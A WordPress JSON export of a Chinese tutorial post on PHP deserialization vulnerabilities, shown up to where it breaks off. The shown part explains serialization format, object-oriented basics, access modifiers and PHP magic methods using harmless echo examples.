{"id":133,"date":"2025-06-09T21:21:17","date_gmt":"2025-06-09T13:21:17","guid":{"rendered":"http:\/\/101.201.119.158\/?p=133"},"modified":"2025-11-18T22:55:56","modified_gmt":"2025-11-18T14:55:56","slug":"php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"http:\/\/101.201.119.158\/?p=133","title":{"rendered":"PHP\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u6f0f\u6d1e\u5229\u7528\uff1a<\/h2>\n\n\n\n<p>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08Deserialization Vulnerability\uff09\u662f\u4e00\u79cd\u5b89\u5168\u6f0f\u6d1e\uff0c\u5b58\u5728\u4e8e\u5e94\u7528\u7a0b\u5e8f\u4e2d\u5bf9\u6570\u636e\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u7684\u8fc7\u7a0b\u4e2d\u3002\u5f53\u5e94\u7528\u7a0b\u5e8f\u63a5\u6536\u5230\u5916\u90e8\u4f20\u9012\u7684\u6076\u610f\u5e8f\u5217\u5316\u6570\u636e\u5e76\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u6267\u884c\u672a\u7ecf\u6388\u6743\u7684\u4ee3\u7801\u6216\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u53d7\u5230\u653b\u51fb\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u539f\u7406\uff1a<\/h2>\n\n\n\n<p>\u65e2\u7136\u662f\u53cd\u5e8f\u5217\u5316\u7684\u8bdd\uff0c\u9996\u5148\u8981\u4e86\u89e3\u4ec0\u4e48\u662f\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u4ee5\u53ca\u4ed6\u4eec\u7684\u533a\u522b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5e8f\u5217\u5316\uff1a\u5c31\u662f\u5c06\u5bf9\u8c61\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\u8fdb\u884c\u5b58\u50a8 class S{` &nbsp;  `public $test=\"pikachu\";``}`` &nbsp; ``$s=new S(); &nbsp; &nbsp; \/\/\u521b\u5efa\u4e00\u4e2a\u5bf9\u8c61`` &nbsp; ``serialize($s); &nbsp; &nbsp; \/\/\u628a\u8fd9\u4e2a\u5bf9\u8c61\u8fdb\u884c\u5e8f\u5217\u5316`` &nbsp; ``\u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u7ed3\u679c\u662f\u8fd9\u4e2a\u6837\u5b50\u7684:O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}` &nbsp;  `O:\u4ee3\u8868object` &nbsp;  
`1:\u8868\u793a\u8be5\u5bf9\u8c61\u7684\u7c7b\u540d\u7684\u5b57\u8282\u6570\uff08\u5373\u7c7b\u540d\u957f\u5ea6\u4e3a1\uff09` &nbsp;  `S:\u5bf9\u8c61\u7684\u540d\u79f0` &nbsp;  `1:\u8868\u793a\u8be5\u5bf9\u8c61\u6709 1 \u4e2a\u5c5e\u6027\u3002` &nbsp;  `s:\u6570\u636e\u7c7b\u578b` &nbsp;  `4:\u53d8\u91cf\u540d\u79f0\u7684\u957f\u5ea6` &nbsp;  `test:\u53d8\u91cf\u540d\u79f0` &nbsp;  `s:\u6570\u636e\u7c7b\u578b` &nbsp;  `7:\u53d8\u91cf\u503c\u7684\u957f\u5ea6` &nbsp;  `pikachu:\u53d8\u91cf\u503c<br>\u53cd\u5e8f\u5217\u5316\uff1a\u5c31\u662f\u5c06\u5b57\u7b26\u4e32\u8f6c\u5316\u4e3a\u5bf9\u8c61 $u=unserialize(\"O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}\");`` &nbsp; ``echo $u-&gt;test; \/\/\u5f97\u5230\u7684\u7ed3\u679c\u4e3apikachu (\u6ce8\u610f\u662fecho)\u53cd\u5e8f\u5217\u5316\u4f7f\u7528 unserialize () \u51fd\u6570\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u5bf9\u8c61\uff0c\u5e8f\u5217\u5316\u4f7f\u7528 serialize () \u51fd\u6570\u5c06\u5bf9\u8c61\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\uff1b \u53cd\u5e8f\u5217\u5316\u4e0d\u89e6\u53d1\u7c7b\u7684\u6210\u5458\u65b9\u6cd5\uff0c\u9700\u8981\u8c03\u7528\u65b9\u6cd5\u540e\u624d\u80fd\u89e6\u53d1<br>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff1a\u5c31\u662f\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\uff0c\u5982\u679c\u6076\u610f\u8005\u53ef\u4ee5\u5bf9\u5c06\u8981\u8f6c\u6362\u7684\u5b57\u7b26\u4e32\u8fdb\u884c\u64cd\u63a7\uff0c\u4ece\u800c\u8fbe\u5230\u4efb\u610f\u4ee3\u7801\u6267\u884c\u7684\u64cd\u4f5c<\/pre>\n\n\n\n<p>\u800c\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u4e3b\u8981\u539f\u7406\u662f\u5e94\u7528\u7a0b\u5e8f\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\u6ca1\u6709\u5bf9\u4f20\u5165\u7684\u6570\u636e\u8fdb\u884c\u8db3\u591f\u7684\u9a8c\u8bc1\u548c\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6784\u9020\u7684\u6076\u610f\u5e8f\u5217\u5316\u6570\u636e\u6765\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">PHP\u9762\u5411\u5bf9\u8c61\u7684\u57fa\u7840\uff1a<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1.\u8fc7\u7a0b\uff1a<\/h3>\n\n\n\n<p>\u9762\u5411\u8fc7\u7a0b\u662f\u4e00\u79cd\u4ee5\u201c\u6574\u4f53\u4e8b\u4ef6\u201d\u4e3a\u4e2d\u5fc3\u7684\u7f16\u7a0b\u601d\u60f3\uff0c\u7f16\u7a0b\u7684\u65f6\u5019\u628a\u89e3\u51b3\u95ee\u9898\u7684\u6b65\u9aa4\u5206\u6790\u51fa\u6765\uff0c\u7136\u540e\u7528\u51fd\u6570\u628a\u8fd9\u4e9b\u6b65\u9aa4\u5b9e\u73b0\uff0c\u5728\u4e00\u6b65\u4e00\u6b65\u7684\u5177\u4f53\u6b65\u9aa4\u4e2d\u518d\u6309\u987a\u5e8f\u8c03\u7528\u51fd\u6570\uff1b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2.\u5bf9\u8c61\uff1a<\/h3>\n\n\n\n<p>\u9762\u5411\u5bf9\u8c61\u662f\u4e00\u79cd\u4ee5\u201c\u5bf9\u8c61\u201d\u4e3a\u4e2d\u5fc3\u7684\u7f16\u7a0b\u601d\u60f3\uff0c\u628a\u8981\u89e3\u51b3\u7684\u95ee\u9898\u5206\u89e3\u6210\u5404\u4e2a\u201c\u5bf9\u8c61\u201d\uff1b\u5bf9\u8c61\u662f\u4e00\u4e2a\u7531\u4fe1\u606f\u53ca\u5bf9\u4fe1\u606f\u8fdb\u884c\u5904\u7406\u7684\u63cf\u8ff0\u6240\u7ec4\u6210\u7684\u6574\u4f53\uff0c\u662f\u5bf9\u73b0\u5b9e\u4e16\u754c\u7684\u62bd\u8c61\uff1b<\/p>\n\n\n\n<p>\u5bf9\u8c61\u7684\u4e09\u4e2a\u7279\u5f81\uff1a\u5bf9\u8c61\u7684\u884c\u4e3a\uff0c\u5bf9\u8c61\u7684\u5f62\u6001\uff0c\u5bf9\u8c61\u7684\u8868\u793a<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3.\u7c7b\u7684\u5b9a\u4e49\uff1a<\/h3>\n\n\n\n<p>\u7c7b\u662f\u5b9a\u4e49\u4e86\u4e00\u4ef6\u4e8b\u7269\u7684\u62bd\u8c61\u7279\u70b9\uff0c\u5b83\u5c06\u6570\u636e\u7684\u5f62\u5f0f\u4ee5\u53ca\u8fd9\u4e9b\u6570\u636e\u4e0a\u7684\u64cd\u4f5c\u5c01\u88c5\u5728\u4e00\u8d77\uff1b\u5bf9\u8c61\u662f\u5177\u6709\u7c7b\u7c7b\u578b\u7684\u53d8\u91cf\uff0c\u662f\u5bf9\u7c7b\u7684\u5b9e\u4f8b\uff1b<\/p>\n\n\n\n<p>\u7c7b\u7684\u5b9a\u4e49\u5305\u62ec\u5b9a\u4e49\u7c7b\u540d\u3001\u5b9a\u4e49\u6210\u5458\u5c5e\u6027\u3001\u5b9a\u4e49\u6210\u5458\u65b9\u6cd5\uff1b 
\u5185\u90e8\u6784\u6210\uff1a\u6210\u5458\u5c5e\u6027(\u53d8\u91cf)+\u6210\u5458\u65b9\u6cd5(\u51fd\u6570)<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">4.\u7ee7\u627f\uff1a<\/h3>\n\n\n\n<p>\u7ee7\u627f\u6027\u662f\u5b50\u7c7b\u81ea\u52a8\u5171\u4eab\u7236\u7c7b\u6570\u636e\u7ed3\u6784\u548c\u65b9\u6cd5\u7684\u673a\u5236\uff0c\u662f\u7c7b\u4e4b\u95f4\u7684\u4e00\u79cd\u5173\u7cfb\uff1b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp;  \u5728\u5b9a\u4e49\u548c\u5b9e\u73b0\u4e00\u4e2a\u7c7b\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u5728\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u7684\u57fa\u7840\u4e4b\u4e0a\u6765\u8fdb\u884c\uff0c\u628a\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u6240\u5b9a\u4e49\u7684\u5185\u5bb9\u4f5c\u4e3a\u81ea\u5df1\u7684\u5185\u5bb9\uff0c\u5e76\u52a0\u5165\u82e5\u5e72\u65b0\u7684\u5185\u5bb9\uff1b<\/pre>\n\n\n\n<p>\u7236\u7c7b\uff1a\u4e00\u4e2a\u7c7b\u88ab\u5176\u5b83\u7c7b\u7ee7\u627f\uff0c\u53ef\u5c06\u8be5\u7c7b\u6210\u4e3a\u7236\u7c7b\uff0c\u6216\u57fa\u7c7b\uff0c\u8d85\u7c7b\uff1b<\/p>\n\n\n\n<p>\u5b50\u7c7b\uff1a\u4e00\u4e2a\u7c7b\u7ee7\u627f\u5176\u4ed6\u7c7b\u79f0\u4e3a\u5b50\u7c7b\uff0c\u4e5f\u53ef\u79f0\u4e3a\u6d3e\u751f\u7c7b\uff1b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">5.\u6743\u9650\u4fee\u9970\u7b26\uff1a<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">public\uff1a\u516c\u5171\u7684\uff0c\u5728\u7c7b\u7684\u5185\u90e8\u3001\u5b50\u7c7b\u548c\u7c7b\u7684\u5916\u90e8\u4e2d\u90fd\u53ef\u4ee5\u88ab\u8c03\u7528\uff1b<br>protected\uff1a\u53d7\u4fdd\u62a4\u7684\uff0c\u5728\u7c7b\u7684\u5185\u90e8\u548c\u5b50\u7c7b\u53ef\u4ee5\u88ab\u8c03\u7528\uff0c\u5728\u7c7b\u7684\u5916\u90e8\u4e0d\u53ef\u8c03\u7528\uff1b<br>private\uff1a\u79c1\u6709\u7684\uff0c\u53ea\u80fd\u5728\u7c7b\u7684\u5185\u90e8\u8c03\u7528\uff0c\u5728\u5b50\u7c7b\u548c\u7c7b\u7684\u5916\u90e8\u4e0d\u53ef\u8c03\u7528\uff1b<br>\u4e3e\u4e2a\u6817\u5b50\uff1aclass MyClass {<br> &nbsp;  \/\/\u6210\u5458\u5c5e\u6027<br> &nbsp;  
\/\/\u65b9\u6cd5<br>}<br>&lt;?php<br> &nbsp;  class wea5e1{<br> &nbsp;  public $we='111';<br> &nbsp;  protected $a5='222';<br> &nbsp;  private $e1='333';<br>}<br>$a=new wea5e1();<br>$a -&gt; we = '444';<br>echo serialize($a);<br>O:6:\"wea5e1\":3:{s:2:\"we\";s:3:\"444\";s:5:\"%00*%00a5\";s:3:\"222\";s:10:\"%00wea5e1%00e1\";s:3:\"333\";}<br>\u53ef\u4ee5\u53d1\u73b0\u8fd9\u4e2a\u6743\u9650protected\u4f1a\u5728\u4ed6\u7684\u6210\u5458\u90a3\u91cc\u52a0\u4e0a\u53bb%00*%00\uff0c\u800cprivate\u5219\u4f1a\u52a0%00\u7c7b\u7684\u540d\u5b57%00<br>\u4e00\u822c\u683c\u5f0f\uff1a<br>\u53d8\u91cf\u7c7b\u578b\uff1a\u7c7b\u540d\u957f\u5ea6\uff1a\u7c7b\u540d\uff1a\u5c5e\u6027\u6570\u91cf:{\u5c5e\u6027\u7c7b\u578b\uff1a\u5c5e\u6027\u540d\u957f\u5ea6\uff1a\u5c5e\u6027\u540d\uff1b\u5c5e\u6027\u503c\u7c7b\u578b\uff1a\u5c5e\u6027\u503c\u957f\u5ea6\uff1a\u5c5e\u6027\u503c\u5185\u5bb9}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">6.\u7c7b\u578b\u63cf\u8ff0<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">a &nbsp; array \u6570\u7ec4\u578b<br>b &nbsp; boolean \u5e03\u5c14\u578b<br>d &nbsp; double \u6d6e\u70b9\u578b<br>i &nbsp; integer \u6574\u6570\u578b<br>o &nbsp; common object \u5171\u540c\u5bf9\u8c61<br>r &nbsp; object reference \u5bf9\u8c61\u5f15\u7528<br>s &nbsp; non-escaped binary string \u975e\u8f6c\u4e49\u7684\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32<br>S &nbsp; escaped binary string \u8f6c\u4e49\u7684\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32<br>C &nbsp; custom object \u81ea\u5b9a\u4e49\u5bf9\u8c61<br>O &nbsp; class \u5bf9\u8c61<br>N &nbsp; null \u7a7a<br>R &nbsp; pointer reference \u6307\u9488\u5f15\u7528<br>U &nbsp; unicode string Unicode \u7f16\u7801\u7684\u5b57\u7b26\u4e32<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u9b54\u672f\u65b9\u6cd5\uff1a<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">__construct() \u6784\u9020\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528\u3002\uff08\u5b9e\u4f8b\u5316\u65f6\uff09 <br>__destruct() 
\u6790\u6784\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528\u3002\u4f1a\u5728\u5230\u67d0\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u90fd\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c &nbsp;<br>__toString \u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u88ab\u8c03\u7528\uff0c\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\uff0c\u8fd4\u56de\u503c\u9700\u8981\u4e3a\u5b57\u7b26\u4e32 &nbsp;<br>__wakeup() \u8c03\u7528unserialize()\u65f6\u89e6\u53d1\uff0c\u53cd\u5e8f\u5217\u5316\u6062\u590d\u5bf9\u8c61\u4e4b\u524d\u8c03\u7528\u8be5\u65b9\u6cd5\uff0c\u4f8b\u5982\u91cd\u65b0\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u6216\u6267\u884c\u5176\u5b83\u521d\u59cb\u5316\u64cd\u4f5c\u3002unserialize()\u4f1a\u68c0\u67e5\u662f\u5426\u5b58\u5728\u4e00\u4e2a__wakeup()\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u4f1a\u5148\u8c03\u7528__wakeup()\uff0c\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u9700\u8981\u7684\u8d44\u6e90\u3002 &nbsp;<br>__sleep() \u8c03\u7528serialize()\u65f6\u89e6\u53d1 
\uff0c\u5728\u5bf9\u8c61\u88ab\u5e8f\u5217\u5316\u524d\u81ea\u52a8\u8c03\u7528\uff0c\u5e38\u7528\u4e8e\u63d0\u4ea4\u672a\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u6216\u7c7b\u4f3c\u7684\u6e05\u7406\u64cd\u4f5c\u3002\u540c\u65f6\uff0c\u5982\u679c\u6709\u4e00\u4e9b\u5f88\u5927\u7684\u5bf9\u8c61\uff0c\u4f46\u4e0d\u9700\u8981\u5168\u90e8\u4fdd\u5b58\uff0c\u8fd9\u4e2a\u529f\u80fd\u5c31\u5f88\u597d\u7528\u3002serialize()\u51fd\u6570\u4f1a\u68c0\u67e5\u7c7b\u4e2d\u662f\u5426\u5b58\u5728\u4e00\u4e2a\u9b54\u672f\u65b9\u6cd5__sleep()\u3002\u5982\u679c\u5b58\u5728\uff0c\u8be5\u65b9\u6cd5\u4f1a\u5148\u88ab\u8c03\u7528\uff0c\u7136\u540e\u624d\u6267\u884c\u5e8f\u5217\u5316\u64cd\u4f5c\u3002\u6b64\u529f\u80fd\u53ef\u4ee5\u7528\u4e8e\u6e05\u7406\u5bf9\u8c61\uff0c\u5e76\u8fd4\u56de\u4e00\u4e2a\u5305\u542b\u5bf9\u8c61\u4e2d\u6240\u6709\u5e94\u88ab\u5e8f\u5217\u5316\u7684\u53d8\u91cf\u540d\u79f0\u7684\u6570\u7ec4\u3002\u5982\u679c\u8be5\u65b9\u6cd5\u672a\u8fd4\u56de\u4efb\u4f55\u5185\u5bb9\uff0c\u5219 NULL \u88ab\u5e8f\u5217\u5316\uff0c\u5e76\u4ea7\u751f\u4e00\u4e2aE_NOTICE\u7ea7\u522b\u7684\u9519\u8bef &nbsp;<br>__call() \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\uff0c\u5373\u5f53\u8c03\u7528\u5bf9\u8c61\u4e2d\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u4f1a\u81ea\u52a8\u8c03\u7528\u8be5\u65b9\u6cd5 &nbsp;<br>__callStatic() \u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 &nbsp;<br>__get() \u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e\uff0c\u5373\u5728\u8c03\u7528\u79c1\u6709\u5c5e\u6027\u7684\u65f6\u5019\u4f1a\u81ea\u52a8\u6267\u884c &nbsp;<br>__set() \u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027 &nbsp;<br>__isset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1 &nbsp;<br>__unset() 
\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1 &nbsp;<br>__invoke() \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">construct():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u6784\u9020\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528\u3002\uff08\u5b9e\u4f8b\u5316\u65f6\uff09\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public function __construct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo 'construct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>\/\/construct \u65b9\u6cd5\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">destruct():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u6790\u6784\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528\u3002\u4f1a\u5728\u5230\u67d0\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u90fd\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public function __destruct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo 'destruct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new wea5e1(); \/\/destruct\u65b9\u6cd5\u89e6\u53d1<\/pre>\n\n\n\n<p>\u867d\u7136\u8fd9\u4e24\u4e2a\u7684\u65b9\u5f0f\u5dee\u4e0d\u591a\u4f46\u662f\u4e8c\u8005\u4f18\u5148\u7ea7\u4e0d\u4e00\u6837<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  echo 'construct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br> &nbsp;  public function __destruct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo 'destruct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new wea5e1(); \/\/construct\u65b9\u6cd5\u89e6\u53d1destruct\u65b9\u6cd5\u89e6\u53d1<\/pre>\n\n\n\n<h4 
class=\"wp-block-heading\">tostring():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u88ab\u8c03\u7528\uff0c\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\uff0c\u8fd4\u56de\u503c\u9700\u8981\u4e3a\u5b57\u7b26\u4e32 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class me{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public function __toString()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  return '__toString\u65b9\u6cd5\u5df2\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a  = new me();<br>\/\/echo $a;<br>echo \"\\n\";<br>echo serialize($a);\/\/O:2:\"me\":1:{s:4:\"name\";s:6:\"wea5e1\";}<br>\u53d6\u6d88echo $a\u7684\u6ce8\u91ca\u7684\u8bdd \/\/__toString\u65b9\u6cd5\u5df2\u89e6\u53d1<br>O:2:\"me\":1:{s:4:\"name\";s:6:\"wea5e1\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">wakeup():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528unserialize()\u65f6\u89e6\u53d1\uff0c\u53cd\u5e8f\u5217\u5316\u6062\u590d\u5bf9\u8c61\u4e4b\u524d\u8c03\u7528\u8be5\u65b9\u6cd5\uff0c\u4f8b\u5982\u91cd\u65b0\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u6216\u6267\u884c\u5176\u5b83\u521d\u59cb\u5316\u64cd\u4f5c\u3002unserialize()\u4f1a\u68c0\u67e5\u662f\u5426\u5b58\u5728\u4e00\u4e2a__wakeup()\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u4f1a\u5148\u8c03\u7528__wakeup()\uff0c\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u9700\u8981\u7684\u8d44\u6e90\u3002(\u8fd9\u91cc\u6709\u4e2a\u7ed5\u8fc7)\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class me{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public function __wakeup()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo '__wakeup\u65b9\u6cd5\u5df2\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new me();<br>$b = serialize($a);<br>echo $b;<br>$b = unserialize($b); \/\/O:2:\"me\":1:{s:4:\"name\";s:6:\"wea5e1\";}__wakeup\u65b9\u6cd5\u5df2\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">sleep():<\/h4>\n\n\n\n<pre 
class=\"wp-block-preformatted\">\u8c03\u7528serialize()\u65f6\u89e6\u53d1 \uff0c\u5728\u5bf9\u8c61\u88ab\u5e8f\u5217\u5316\u524d\u81ea\u52a8\u8c03\u7528\uff0c\u5e38\u7528\u4e8e\u63d0\u4ea4\u672a\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u6216\u7c7b\u4f3c\u7684\u6e05\u7406\u64cd\u4f5c\u3002\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class me {<br>public $name = \"wea5e1\";<br>public $age = 18;<br>\u200b<br>public function __sleep() {<br>echo '__sleep\u65b9\u6cd5\u5df2\u89e6\u53d1' . PHP_EOL;<br>return ['age'];  \/\/ \u6307\u5b9a\u8981\u5e8f\u5217\u5316\u7684\u5c5e\u6027<br>}<br>}<br>\u200b<br>$a = new me();<br>$b = serialize($a);<br>echo $b;  \/\/__sleep\u65b9\u6cd5\u5df2\u89e6\u53d1<br>O:2:\"me\":1:{s:3:\"age\";i:18;}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">call():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __call($name, $age){<br> &nbsp; &nbsp; &nbsp;  echo 'call\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>$a -&gt; sb();<br>echo serialize($a); \/\/call\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5148\u8bb2\u4e0bget\u548cset(\u8fd9\u4e09\u4e2a\u53ef\u80fd\u7ecf\u5e38\u641e\u6df7)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">get():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u662f\u89e6\u53d1 \u548c\u4e0a\u9762\u8981\u533a\u5206\u5f00\u6765 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __get($name){<br> &nbsp; &nbsp; &nbsp;  echo 'get\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo 
\"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>$a -&gt; sb;<br>echo serialize($a);\/\/get\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">set():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __set($name,$age){<br> &nbsp; &nbsp; &nbsp;  echo 'set\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>$a -&gt; sb = \"nb\";<br>echo serialize($a); \/\/set\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">isset():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5f53\u4f7f\u7528 isset \u6216\u8005\u662f empty 